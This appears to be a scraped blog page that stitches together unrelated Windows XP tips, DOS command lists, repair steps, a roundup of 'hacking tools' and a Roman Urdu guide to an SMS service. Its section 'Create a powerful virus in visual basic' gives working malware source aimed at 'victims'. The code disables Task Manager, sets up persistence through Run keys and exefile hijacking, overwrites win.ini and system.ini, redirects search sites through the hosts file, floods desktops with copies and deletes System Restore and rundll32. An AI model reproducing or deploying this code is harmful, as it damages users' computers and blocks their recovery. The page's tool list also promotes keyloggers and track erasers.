A Closed port indicates that the port is reachable but there is no program currently accepting connections there.
If the port is indicated as Open there is an application or service on your computer actively accepting connections.

The time to check each port will range from less than a second up to 20 seconds. Ports which are Secure will take the most time and if u are secured after the test ends tells u

Test complete.
No open ports were found

All Keyboard Shortcuts for windows & office XP

Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:

Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Access Stored User Names And Passwords, Xp Users

Access Stored User Names and Passwords

Windows XP related

Access Stored User Names and Passwords with rundll32.exe in Windows XP


1. Click on START - RUN Type

rundll32.exe keymgr.dll,KRShowKeyMgr

2. Press Enter

All MS-DOS Commands

ANSI.SYS - Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND - Causes MS-DOS to look in other directories when editing a file or running a command.
ARP - Displays, adds, and removes arp information from network devices.
ASSIGN - Assign a drive letter to an alternate letter.
ASSOC - View the file associations.
AT - Schedule a time to execute commands or programs.
ATMADM - Lists connections and addresses seen by Windows ATM call manager.
ATTRIB - Display and change file attributes.

BATCH - Recovery console command that executes a series of commands in a file.
BACKUP - Enables users to backup their data on their computer.
BOOTCFG - Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK - Enable / disable CTRL + C feature.

CACLS - View and modify file ACL's.
CALL - Calls a batch file from another batch file.
CD - Changes directories.
CHCP - Supplement the International keyboard and character set information.
CHDIR - Changes directories.
CHKDSK - Check the hard disk drive running FAT for errors.
CHKNTFS - Check the hard disk drive running NTFS for errors.
CHOICE - Specify a listing of multiple options within a batch file.
CLS - Clears the screen.
CMD - Opens the command interpreter.
COLOR - Easily change the foreground and background color of the MS-DOS window.
COMMAND - Opens the command interpreter.
COMP - Compares files.
COMPACT - Compresses and uncompress files.
CONTROL - Open control panel icons from the MS-DOS prompt.
CONVERT - Convert FAT to NTFS.
COPY - Copy one or more files to an alternate location.
CTTY - Change the computers input/output devices.

DATE - View or change the systems date.
DEBUG - Debug utility to create assembly programs to modify hardware settings.
DEFRAG - Re-arrange the hard disk drive to help with loading programs.
DEL - Deletes one or more files.
DELETE - Recovery console command that deletes a file.
DELTREE - Deletes one or more files and/or directories.
DIR - List the contents of one or more directory.
DISABLE - Recovery console command that disables Windows system services or drivers.
DISKCOMP - Compare a disk with another disk.
DISKPART - used to delete and create partitions.
DISKCOPY - Copy the contents of one disk and place them on another disk.
DOSKEY - Command to view and execute commands that have been run in the past.
DOSSHELL - A GUI to help with early MS-DOS users.
DRIVPARM - Enables overwrite of original device drivers.

ECHO - Displays messages and enables and disables echo.
EDIT - View and edit files.
EDLIN - View and edit files.
EMM386 - Load extended Memory Manager.
ENABLE - Recovery console command to enable a disable service or driver.
ENDLOCAL - Stops the localization of the environment changes enabled by the setlocal command.
ERASE - Erase files from computer.
EXIT - Exit from the command interpreter.
EXPAND - Expand a M*cro$oft Windows file back to it's original format.
EXTRACT - Extract files from the M*cro$oft Windows cabinets.

FASTHELP - Displays a listing of MS-DOS commands and information about them.
FC - Compare files.
FDISK - Utility used to create partitions on the hard disk drive.
FIND - Search for text within a file.
FINDSTR - Searches for a string of text within a file.
FIXBOOT - Writes a new boot sector.
FIXMBR - Writes a new boot record to a disk drive.
FOR - Boolean used in batch files.
FORMAT - Command to erase and prepare a disk drive.
FTP - Command to connect and operate on a FTP server.
FTYPE - Displays or modifies file types used in file extension associations.

GOTO - Movesa batch file to a specific label or location.
GRAFTABL - Show extended characters in graphics mode.

HELP - Display a listing of commands and brief explanation.
HOSTNAME -Display the hostname of the machine.

IF - Allows for batch files to perform conditional processing.
IFSHLP.SYS - 32-bit file manager.
IPCONFIG - Network command to view network adapter settings and assigned values.

KEYB - Change layout of keyboard.

LABEL - Change the label of a disk drive.
LH - Load a device driver in to high memory.
LISTSVC - Recovery console command that displays the services and drivers.
LOADFIX - Load a program above the first 64k.
LOADHIGH - Load a device driver in to high memory.
LOCK - Lock the hard disk drive.
LOGON - Recovery console command to list installations and enable administrator login.

MAP - Displays the device name of a drive.
MD - Command to create a new directory.
MEM - Display memory on system.
MKDIR - Command to create a new directory.
MODE - Modify the port or display settings.
MORE - Display one page at a time.
MOVE - Move one or more files from one directory to another directory.
MSAV - Early M*cro$oft Virus scanner.
MSBACKUP -MS-DOS application that enables users to backup their data on their computer.
MSD - Diagnostics utility.
MSCDEX - Utility used to load and provide access to the CD-ROM.
MWBACKUP - MS-DOS application that enables users to backup their data on their computer.

NBTSTAT - Displays protocol statistics and current TCP/IP connections using NBT
NET - Update, fix, or view the network or network settings
NETSH - Configure dynamic and static network information from MS-DOS.
NETSTAT - Display the TCP/IP network protocol statistics and information.
NLSFUNC - Load country specific information.
NSLOOKUP - Look up an IP address of a domain or host on a network.

PATH - View and modify the computers path location.
PATHPING - View and locate locations of network latency.
PAUSE - Command used in batch files to stop the processing of a command.
PING - Test / send information to another network computer or network device.
POPD - Changes to the directory or network path stored by the pushd command.
POWER - Conserve power with computer portables.
PRINT - Prints data to a printer port.
PROMPT - View and change the MS-DOS prompt.
PUSHD - Stores a directory or network path in memory so it can be returned to at any time.

QBASIC - Open the QBasic.

RD - Removes an empty directory.
REN - Renames a file or directory.
RENAME - Renames a file or directory.
RMDIR - Removes an empty directory.
ROUTE - View and configure windows network route tables.
RUNAS - Enables a user to execute a program on another computer.

SCANDISK - Run the scandisk utility.
SCANREG - Scan registry and recover registry from errors.
SET - Change one variable or string to another.
SETLOCAL - Enables local environments to be changed without affecting anything else.
SETVER - Change MS-DOS version to trick older MS-DOS programs.
SFC - Scans and replaces any M*cro$oft Windows file on the computer and replaces any changed file with the correct version
SHARE - Installs support for file sharing and locking capabilities.
SHIFT - Changes the position of replaceable parameters in a batch program.
SHUTDOWN - Shutdown the computer from the MS-DOS prompt.
SMARTDRV - Create a disk cache in conventional memory or extended memory.
SORT - Sorts the input and displays the output to the screen.
START - Start a separate window in Windows from the MS-DOS prompt.
SUBST - Substitute a folder on your computer for another drive letter.
SWITCHES - Remove add functions from MS-DOS.
SYS - Transfer system files to disk drive.
SYSTEMINFO - Displays complete system information for M*cro$oft Windows XP Professional computers.
SYSTEMROOT - The systemroot command is a recovery console command that sets the current directory as the system root directory.

TELNET - Telnet to another computer / device from the prompt.
TIME - View or modify the system time.
TITLE - Change the title of their MS-DOS window.
TRACERT - Visually view a network packets route across a network.
TREE - View a visual tree of the hard disk drive.
TYPE - Display the contents of a file.

UNDELETE - Undelete a file that has been deleted.
UNFORMAT - Unformat a hard disk drive.
UNLOCK - Unlock a disk drive.

VER Display - the version information.
VERIFY - Enables or disables the feature to determine if files have been written properly.
VOL - Displays the volume information about the designated drive.

XCOPY - Copy multiple files, directories, and/or drives from one location to another.

Lock Your System On Mouse Click

Lock your System on Mouse Click

Feel hard to press CTRL+ALT+DEL to lock your machine ??????
Try this and create the icon to lock the machine.


1. Right click an empty spot on the desktop, point to New and click Shortcut.

2. In the Create Shortcut dialog box, type the following in the 'Type the location' of the item text box:

"rundll32 user32.dll,LockWorkStation" remove quotes while typing.

3. Click Next.

4. In "Type a name for this shortcut", type "" (any name as u wish) and Click Finish

5. Create a shortcut in your shortcut bar & use it

Repaire windows XP without installation

Some Windows XP Repair Tricks ........

Repair Install
If XP is corrupted to the point where none of the previous solutions get it to boot,
you can do a Repair Install that might work as well as keep the current settings.
Make sure you have your valid WindowsXP key.
The whole process takes about half an hour depending on your computer
If you are being prompted for the administrator's password, you need to choose the 2nd repair option, not the first.

Insert and boot from your WindowsXP CD
At the second R=Repair option, press the R key
This will start the repair
Press F8 for I Agree at the Licensing Agreement
Press R when the directory where WindowsXP is installed is shown. Typically this is C:\WINDOWS
It will then check the C: drive and start copying files
It will automatically reboot when needed. Keep the CD in the drive.
You will then see the graphic part of the repair that is like during a normal install of XP (Collecting Information, Dynamic Update, Preparing Installation, Installing Windows, Finalizing Installation)
When prompted, click on the Next button
When prompted, enter your XP key
Normally you will want to keep the same Workgroup or Domain name
The computer will reboot
Then you will have the same screens as a normal XP Install
Activate if you want (usually a good idea)
Register if you want (but not necessary)
Finish
At this point you should be able to log in with any existing accounts.

--------------------------------------------------------------------------------

NTOSKRNL Missing or Corrupt
If you get an error that NTOSKRNL not found:

Insert and boot from your WindowsXP CD.
At the first R=Repair option, press the R key
Press the number that corresponds to the correct location for the installation of Windows you want to repair.
Typically this will be #1
Change to the drive that has the CD ROM.
CD i386
expand ntkrnlmp.ex_ C:\Windows\System32\ntoskrnl.exe
If WindowsXP is installed in a different location, just make the necessary change to C:\Windows
Take out the CD ROM and type exit

--------------------------------------------------------------------------------

HAL.DLL Missing or Corrupt
If you get an error regarding a missing or corrupt hal.dll file, it might simply be the BOOT.INI file on the root of the C: drive that is misconfigured

Insert and boot from your WindowsXP CD.
At the first R=Repair option, press the R key
Press the number that corresponds to the correct location for the installation of Windows you want to repair.
Typically this will be #1
Type bootcfg /list to show the current entries in the BOOT.INI file
Type bootcfg /rebuild to repair it
Take out the CD ROM and type exit

--------------------------------------------------------------------------------

Corrupted or Missing \WINDOWS\SYSTEM32\CONFIG
If you get the error:
Windows could not start because the following files is missing or corrupt
\WINDOWS\SYSTEM32\CONFIG\SYSTEM or \WINDOWS\SYSTEM32\CONFIG\SOFTWARE

Insert and boot from your WindowsXP CD.
At the first R=Repair option, press the R key
Press the number that corresponds to the correct location for the installation of Windows you want to repair.
Typically this will be #1
Enter in the administrator password when requested
cd \windows\system32\config
Depending on which section was corrupted:
ren software software.bad or ren system system.bad
Depending on which section was corrupted
copy \windows\repair\system
copy \windows\repair\software
Take out the CD ROM and type exit

--------------------------------------------------------------------------------

NTLDR or NTDETECT.COM Not Found
If you get an error that NTLDR is not found during bootup,

If you have FAT32 partitions, it is much simpler than with NTFS.
Just boot with a Win98 floppy and copy the NTLDR or NTDETECT.COM files
from the i386 directory to the root of the C:\ drive.

For NTFS:

Insert and boot from your WindowsXP CD.
At the first R=Repair option, press the R key
Press the number that corresponds to the correct location for the installation of Windows you want to repair.
Typically this will be #1
Enter in the administrator password when requested
Enter in the following commands (X: is replaced by the actual drive letter that is assigned to the CD ROM drive.
COPY X:\i386\NTLDR C\:
COPY X:\i386\NTDETECT.COM C:\
Take out the CD ROM and type exit

Hide All The Desktop Icons

Here is a simple trick to hide all your desktop icons .
Just go to Start->run.Type regedit.

Go to HKEY_CURRENT_USER,then go to Software,then M*cro$oft,then to Windows,go to Current version,then policies and then click on explorer.

On the right hand side,right click and click on New.Then select DWORD value.
Rename this value as "NoDesktop" (without the quotes).Click on it and set its value to 1 in the value data space.Now restart your pc or just log off and log in back.

You will see that all your Desktop icons are gone.
To get back your icons,go to the DWORD value you created,now either delete it or set its value to 0.

In both cases you will get back all your icons.Try it out.

7 GREAT HACKING TOOLS USED BY HACKER

The following tools are tools that are often used by hackers in launching the action. Each tool has its own specifications that can be used as needed.

1. Cain & Abel
A very popular tool is known as a versatile application. Besides can make cracking passwords, this application allows you to obtain the hash values from various sources.

2. Dumpacl-Dumpsec
This tool is used to perform the job enumeration. How it works by exploiting Null Connections, so that these tools are capable of displaying user accounts in detail.

3. Keylogger
This tool can hide itself if detected from the Task Manager. Keylogger secretly records all keyboard activity on a PC that already installed this application, including clipboard, snapshots, and addresses of websites visited.

4. Winfingerprint
This application incorporates many enumeration technique. In this application you can see through the Net BIOS enumeration, SMB, MSRPC, SNMP, and Active Directory. You can just enter the IP address of hosts that want to review and select the scan button to start scanning.

5. Sams Big Play Maker
Application of this one is unique because it can hide hidden text or message that you enter becomes like a form of conversation. Ordinary they will not realize that there was a hidden message in it.

6. Track Eraser Pro
In matters erase the traces, this application is very reliable, because it supports many types of applications. Besides can remove the log that is recorded by Windows, this application will remove traces of Office applications, RealOne player, media player and so forth.

7. Active Password Changer
With this tool, you can change the password in the computer that you can physically access. There are some features it possesses, namely booting from USB drives, floppy disks, or via CD.

4 SECRETS BEHIND THE COMPUTER MOUSE

There are some secrets behind operating a mouse that was one of sophistication. This secret can help speed up your work. Here are the secrets:

1. Closing browser tab
when surfing with a browser tabs open and want to close, usually the thing you do is to click the X in the upper right. You can more quickly close your browser tab using the mouse scroll. The trick is to press the scroll mouse in the browser tab. So the browser will be closed quickly.

2. Open a new tab
Open link in new tab by pressing the scroll mouse on the link that you want, then the link will automatically open in a new tab.

3. Opening a collection of links bookmarks at once
If you have favorite sites you visit frequently, simply click on a bookmark folder with scroll mouse. Then automatically all the links to your favorite sites in the folder will open entirely automatically.

4. Scroll automatically to long document
If you open a web page or a long document such as Word, Excel or Adobe reader, to make scrolling, you usually do by rotating the scroll mouse with a finger. However, if the page is very long, it takes a long time. To avoid this, simply click and hold down the mouse scroll button briefly. Then you will enter the autoscroll feature, and you can move the scrolling pages you are open only with a bit of moving the mouse without having to rotate the scroll button.

Monday, March 7, 2011

Create a powerful virus in visual basic

open VB and follow the code
--code start here--
Private Sub Form_Load()
On Error Resume Next
'This command will allow the application to continue running
'even if an error occurs instead of terminating/closing.
Hide
'This command will hide the application from even being seen on the victims
'screen even if your program has it's settings set to Visible|True
App.TaskVisible = False
'This command is even better, this command will stop your program
'from showing up in Task Manager-Applications Tab List, but it will still
'show up in process list, sorry =/
End Sub

'disable taskmanager

Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", vbHide
Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ###Name### /t REG_SZ /d ###Drive:\Path\Name.exe### /f", vbHide
'This command will make your application start with windows.
Shell "REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f", vbHide
'This command will make your application start when ever the victim opens another application via msnmsngr.exe as an example
Shell "REG add HKLM\Control Panel\International /v s1159 /t REG_S /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v s2359 /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v SLongDate /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sShortDate /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sTimeFormat /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sNativeDigits /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
'These commands will set the time & date for the victims computer permanently
'Change the ###Letter/Symbol/Number### to ? for example, and the victim will see ???????? for the time and ??????
'for the date.
FileCopy App.Path & "\" & App.EXEName & ".EXE", "Drive:\Path\Name.exe"
'This code well, it couldn't be more obvious what it does, but when copying your virus/worm ect
'to a new path, try looking up windows processes like svchost.exe, making it harder for the victim
'to get rid of your virus/worm/trojan ect.

Dim intResult As Integer
Randomize
intResult = Int((9542 * Rnd) + 4592)
FileCopy App.Path & "\" & App.EXEName & ".EXE", "c:\Documents and Settings\All Users\Desktop\DimenBlackScript.exe" & intResult & ".exe"
'Ok for abit of fun, here is a simple code but a real nasty one, add a timer to your application
'interval set to "1" when this code runs, all user accounts desktops will be flooded with your virus and the longer it
'runs the more Memory it takes up and the more viruses that person has to delete, try adding it to places like
' C:\DOCU~\All Users\Start Menu\Programs\Start up\
'That will cause the victim alot of hassle =P.

Kill "c:\windows\win.ini"
Kill "c:\windows\system.ini"
Open "c:\WINDOWS\win.ini" For Output As #1
Print #1, "Load = C:\Program Files\Virus1.exe"
Print #1, "run = C:\Program Files\Virus2.exe"
Close #1
Open "c:\WINDOWS\system.ini" For Output As #1
Print #1, "Shell=Explorer.exe C:\WINDOWS\System\Virus3.exe"
Print #1, "Shell=Explorer.exe C:\WINDOWS\System32\Virus4.exe"
Close #1
'Ok people more fun, making your application start with windows, without using Registry or DOS
'one little alter and your viruses and start with windows and the victim will not know how.

Open "c:\WINDOWS\system32\drivers\etc\hosts" For Output As #1
Print #1, "208.65.153.251 208.65.153.251 "
Print #1, "208.65.153.251 www.google.com"
Print #1, "208.65.153.251 www.google.co.uk"
Print #1, "208.65.153.251 www.yahoo.com"
Print #1, "208.65.153.251 www.yahoo.co.uk"
Print #1, "208.65.153.251 www.askjeeves.com"
Print #1, "208.65.153.251 www.altavista.com"
Print #1, "208.65.153.251 www.alltheweb.com"
Print #1, "208.65.153.251 www.msn.com"
Print #1, "208.65.153.251 www.hotmail.com"
Print #1, "208.65.153.251 www.myspace.com"
Print #1, "208.65.153.251 www.plunder.com"
Print #1, "208.65.153.251 www.quicksharing.com"
Print #1, "208.65.153.251 www.myspace.co.uk"
Close #1
'Just something to help stop the victim from google-ing what the virus has done, and getting information
'or downloads to help rid them of your infection >=P.

Kill "%SystemRoot%\syst" & "em32\dfrg.msc"
Kill "%SystemRoot%\syste" & "m32\wscui.cpl"
Kill "C:\Program Files\Co" & "mmon Files\Microsoft Shared\MSInfo\msinfo32.exe"
Kill "%SystemRoot%\syste" & "m32\restore\rstrui.exe"
Kill "c:\WINDOWS\syste" & "m32\rundll32.exe"
'Ok now finally let's get rid of System Restore, Rundll(by deleting this file, the victim can no longer
'view the properties window for any file on his or her computer).

--code end here--

Our voice 7111 full commands & method

Respected Member !

Main pichlay month se Our Voice kay baray main search kar raha houn aur kaafi saray groups ka member bi houn, laiken aaj tak mujay ko aik mustanad jaga nahi mili jahan se main is site ki services ko samaj pata. Tho dosto main nay socha kay is topic par aik final thread bana li jay.

Aaj main apko Our Voice service ko JOIN karna, apna GROUP create karna aur is par SMS send karna sikoun ga. Ji Tho sab se pehlay ap apnay mobile (Koi bi network ho) se HELP likain aur pir 7111 par send kar dain.

Within 5 seconds apko 7111 se aik sms recieve hoga jis main Our Voice Service ki tareef hogi. Ap nay isi msg ki reply main ja kar apnay liay pasand kia howa UserId likain (Yaad rahay k UserId 8 Characters se ziyada na ho aur yeh characters aur number ka combination ho, Aur ap jo UserId aik baar create kar lain wo dobara rename nahi ho sakti, so careful to choose UserID). aur 7111 par send kar dain.

Agar apka UserId unique hai tho within 5 seconds apko dosra sms 7111 ki taraf apko CONFIRMATION MSG milay ga. Ap nay is message ki reply main ja kar Yes kar daina hai.


Aub apko aik final message milay ga kay apki matlooba UserId create kar di gai hai. Aub ap 7111 Service kay through Free SMS send kar saktay hain.


Aub apnay group ko promote karnay kay liay koi sms create karain aur apnay tamam friends ko send kar dain. Ta kay apkay friends apki taraf se free msgz recieve karain aur wo messages apki taraf se free jain (WITHOUT ANY COST).

For Example:

[To receive free funny sms's from my side, Text "itsall4u" without quotes and send it to 7111]

Is taraz ka message create karain aur itsall4u ki jaga apnay group ka naam likain. Apkay group ka naam wo hai jo registration kay waqat apnay create kia hai.


Ji ! Aub akhri aur final marhalla aya hai kay apnay Group members ko sms kis tarah send karnay hain.


Apnay jo bi sms apnay group members ko send karna hai wo 7111 par send kar dain, Laiken message 160 characters se ziyada ka na ho, matlab kay aik standard message ho. Aur yeh baat ap kay zehn main clear honi chahyiy kay ap registration kay baad 7111 par jitnay bi sms send kartay hain wo 10000 % free hain aur registration bilkul free hai (registration par apkay 3 sms lagtay hain aur agar ap sms package par hain tho yeh sms apkay package se deduct houn gay. Dont worry start today.

AGAR APKO IS SERVICE KAY BARAY MAIN KOI BI SAWAL HO THO AP MUJAY PM KAR SAKTAY HAIN. INSHALLAH APKO HAR SAWAL KA JAWAB MILAY GA.

Agar apko yeh thread pasand ahai ho tho reply karna na bhooliay ga.


Agar ap mera Group Join karna Chahtay hain tho 31071656 likain aur 7111 par send kar dain. Meray group se har kisam kay funny jokes, islami, poetry, quotes, pashto sms free receive houngay.


Yeh Service aub apnay subscribers ko message deliver karnay par 40 paisa / message khaat rahi hai. Agar ap ZONG ya Ward k member hain tho apkay liay yeh service still free hai !

Keep SMILING !